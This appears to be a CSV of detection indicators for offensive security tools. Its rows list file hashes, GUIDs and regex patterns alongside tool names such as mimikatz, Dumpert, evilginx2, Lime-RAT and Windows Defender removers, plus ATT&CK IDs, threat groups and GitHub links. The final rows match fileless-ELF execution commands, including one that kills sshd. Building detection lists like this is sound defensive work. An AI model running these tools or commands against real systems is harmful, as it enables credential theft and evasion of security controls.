"*fe1e030312bcb26de66eea442200e4d73ff88307784fe6f1f72f776efcd5e9be*",".{0,1000}fe1e030312bcb26de66eea442200e4d73ff88307784fe6f1f72f776efcd5e9be.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","44714"
"*fe1e030312bcb26de66eea442200e4d73ff88307784fe6f1f72f776efcd5e9be*",".{0,1000}fe1e030312bcb26de66eea442200e4d73ff88307784fe6f1f72f776efcd5e9be.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","44715"
"*fe22bb52058886459e0ff6f9c1c70b4604b15c30b5f1e3ebfc58305d4e94a7e3*",".{0,1000}fe22bb52058886459e0ff6f9c1c70b4604b15c30b5f1e3ebfc58305d4e94a7e3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44717"
"*fe2952ae150d2a92e6ef03f68022dc10a792fb8c3e44a46cf2ce1e095e45b9d4*",".{0,1000}fe2952ae150d2a92e6ef03f68022dc10a792fb8c3e44a46cf2ce1e095e45b9d4.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","44719"
"*fe2cc64a77ca3a7620a9ddec10f9f6e80769132f5587cece5dd03d419782481d*",".{0,1000}fe2cc64a77ca3a7620a9ddec10f9f6e80769132f5587cece5dd03d419782481d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44720"
"*fe3714ffa85da624ca247913dfe99fb303ba4217a6e95bc63bf6823874f40b49*",".{0,1000}fe3714ffa85da624ca247913dfe99fb303ba4217a6e95bc63bf6823874f40b49.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44722"
"*fe43248d33a0e7bd20c619186b757febef4508bea3787671d3ecc95ed742b729*",".{0,1000}fe43248d33a0e7bd20c619186b757febef4508bea3787671d3ecc95ed742b729.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44725"
"*FE4414D9-1D7E-4EEB-B781-D278FE7A5619*",".{0,1000}FE4414D9\-1D7E\-4EEB\-B781\-D278FE7A5619.{0,1000}","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","0","#GUIDproject","N/A","10","2","107","26","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z","44726"
"*fe44d88aa5c763905fc4a7b600ac6545f9d169eca637796e28a08a432969f5bc*",".{0,1000}fe44d88aa5c763905fc4a7b600ac6545f9d169eca637796e28a08a432969f5bc.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44727"
"*fe5516f92808349f91469cafff07d9b370f3035e31161ce33f56c08bce13925a*",".{0,1000}fe5516f92808349f91469cafff07d9b370f3035e31161ce33f56c08bce13925a.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44729"
"*fe5fc5bfd15a4c3dbf5d057bcf109d4f4d1b8835085acca6c13508e7baf074a3*",".{0,1000}fe5fc5bfd15a4c3dbf5d057bcf109d4f4d1b8835085acca6c13508e7baf074a3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44731"
"*fe5fc5bfd15a4c3dbf5d057bcf109d4f4d1b8835085acca6c13508e7baf074a3*",".{0,1000}fe5fc5bfd15a4c3dbf5d057bcf109d4f4d1b8835085acca6c13508e7baf074a3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","44732"
"*fe625188da34d9b6551ce1c34627cefd1a3e4da78f1dacc9442d04bd0ea944b0*",".{0,1000}fe625188da34d9b6551ce1c34627cefd1a3e4da78f1dacc9442d04bd0ea944b0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44733"
"*FE66CDDF-8E33-4153-81AF-24BE392698D8*",".{0,1000}FE66CDDF\-8E33\-4153\-81AF\-24BE392698D8.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","44734"
"*fe6a409a936601232cf6d934c8fbf97509086c77026490bbf1d6f795091a006f*",".{0,1000}fe6a409a936601232cf6d934c8fbf97509086c77026490bbf1d6f795091a006f.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","44735"
"*fe6f27e7f2f8b93fd436a7ec4e99c0e79b40e639772b5c8e378406c7b867bd63*",".{0,1000}fe6f27e7f2f8b93fd436a7ec4e99c0e79b40e639772b5c8e378406c7b867bd63.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44736"
"*fe798793251dc5cb179923e733865ea5cbc2f4636a849111de78930c199b487b*",".{0,1000}fe798793251dc5cb179923e733865ea5cbc2f4636a849111de78930c199b487b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44738"
"*fe7c0b6a562e3939e5ae246876cffa6ec2f7c45e70154c50ed8afc44196c7a08*",".{0,1000}fe7c0b6a562e3939e5ae246876cffa6ec2f7c45e70154c50ed8afc44196c7a08.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44739"
"*fe7fef945a2f5a531f50f6ccef4b40cad832f1e0ffe4d424028379f0318c0c11*",".{0,1000}fe7fef945a2f5a531f50f6ccef4b40cad832f1e0ffe4d424028379f0318c0c11.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","44742"
"*fe8498483b5c12b580441a1a03602e7087b2387ee692f2648c79023864985e65*",".{0,1000}fe8498483b5c12b580441a1a03602e7087b2387ee692f2648c79023864985e65.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44744"
"*fe8a247e683cf8041cb460365a29793bacf26f8214b82a7b44d2f8fad3b0af12*",".{0,1000}fe8a247e683cf8041cb460365a29793bacf26f8214b82a7b44d2f8fad3b0af12.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","44745"
"*fe8a647aa7f8ac6084ddd7cae6d861a58f2a51620e4d9044b80722b00fe2f2d4*",".{0,1000}fe8a647aa7f8ac6084ddd7cae6d861a58f2a51620e4d9044b80722b00fe2f2d4.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44746"
"*fe8db7541bc0c9d05dbd2e44e5eaa2bfd5c79968983860416636ea2792abfa5e*",".{0,1000}fe8db7541bc0c9d05dbd2e44e5eaa2bfd5c79968983860416636ea2792abfa5e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44748"
"*FE8F0D23-BDD1-416D-8285-F947BA86D155*",".{0,1000}FE8F0D23\-BDD1\-416D\-8285\-F947BA86D155.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","#GUIDproject","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","44749"
"*fe8fcb5a9335c55ef7fc6c7493e9ee1b13545c194d7ee3bdbb4a9dc943592cd7*",".{0,1000}fe8fcb5a9335c55ef7fc6c7493e9ee1b13545c194d7ee3bdbb4a9dc943592cd7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44750"
"*fea01b74-7a60-4142-a54d-7aa8f6471c00*",".{0,1000}fea01b74\-7a60\-4142\-a54d\-7aa8f6471c00.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","44752"
"*feb09cc39b1520d228e9e9274500b8c229016d6fc8018a2bf19aa9d3601492c5*",".{0,1000}feb09cc39b1520d228e9e9274500b8c229016d6fc8018a2bf19aa9d3601492c5.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","44753"
"*feb7a634c9e832fa1e4f9a42729e52277d3d651c031fb86517304b4eb99fa35b*",".{0,1000}feb7a634c9e832fa1e4f9a42729e52277d3d651c031fb86517304b4eb99fa35b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44754"
"*feb92ee6c4408e3e4b59d0b51220cfcc2b4713cf53a15da2fe4d27e7c5f74c0b*",".{0,1000}feb92ee6c4408e3e4b59d0b51220cfcc2b4713cf53a15da2fe4d27e7c5f74c0b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44755"
"*feb958c545e2fc761140219d66fe588b29fce660d7ba132674863b2149de4891*",".{0,1000}feb958c545e2fc761140219d66fe588b29fce660d7ba132674863b2149de4891.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44756"
"*febf23d1ae51d53d18aff75baa9b3c8f13775b5399e6d15ad138d1a9dcc2b871*",".{0,1000}febf23d1ae51d53d18aff75baa9b3c8f13775b5399e6d15ad138d1a9dcc2b871.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","44757"
"*fec02364227841d1e69c43296245b8606dbabb94096ff43088d7ece41f003aac*",".{0,1000}fec02364227841d1e69c43296245b8606dbabb94096ff43088d7ece41f003aac.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44758"
"*fec3641b2b3bb528832f7d428a701f1621aeabec7a257c8863dad064672b4bb0*",".{0,1000}fec3641b2b3bb528832f7d428a701f1621aeabec7a257c8863dad064672b4bb0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44759"
"*fec9a5ebd0b87374a1f94cf6760a4d1e83ce4333b68c224bc8fb6a464df67850*",".{0,1000}fec9a5ebd0b87374a1f94cf6760a4d1e83ce4333b68c224bc8fb6a464df67850.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","44761"
"*fecf1da09ddb7a5f5ab7cc20c6d542be33193cbc30e5c8c3dd877cee6a682063*",".{0,1000}fecf1da09ddb7a5f5ab7cc20c6d542be33193cbc30e5c8c3dd877cee6a682063.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","44762"
"*fed31f6b45974dfe2f4edc4a180cb44b44caad65e872aa6c656db1d7d3729608*",".{0,1000}fed31f6b45974dfe2f4edc4a180cb44b44caad65e872aa6c656db1d7d3729608.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","44764"
"*fed573df80a1aeb08f129824ce29906dd614fea7b3af704fa0e9324c26e5084a*",".{0,1000}fed573df80a1aeb08f129824ce29906dd614fea7b3af704fa0e9324c26e5084a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44765"
"*fed5d8a2d027d38ad43fdfc4cfc9d8a7c6aa93384f8da45955042fb83c8ff52e*",".{0,1000}fed5d8a2d027d38ad43fdfc4cfc9d8a7c6aa93384f8da45955042fb83c8ff52e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44766"
"*fed9b7e5d2f1b284d5f757fcf95f97d8deb08b794d2764b0318cde7f95cc0496*",".{0,1000}fed9b7e5d2f1b284d5f757fcf95f97d8deb08b794d2764b0318cde7f95cc0496.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","44767"
"*fee */* -l pl | perl*",".{0,1000}fee\s.{0,1000}\/.{0,1000}\s\-l\spl\s\|\sperl.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44768"
"*fee */* -l pl | ruby*",".{0,1000}fee\s.{0,1000}\/.{0,1000}\s\-l\spl\s\|\sruby.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44769"
"*fee -a *killall sshd* *busybox*",".{0,1000}fee\s\-a\s.{0,1000}killall\ssshd.{0,1000}\s.{0,1000}busybox.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44770"
"*fee -c */* | ssh *@*",".{0,1000}fee\s\-c\s.{0,1000}\/.{0,1000}\s\|\sssh\s.{0,1000}\@.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","44771"
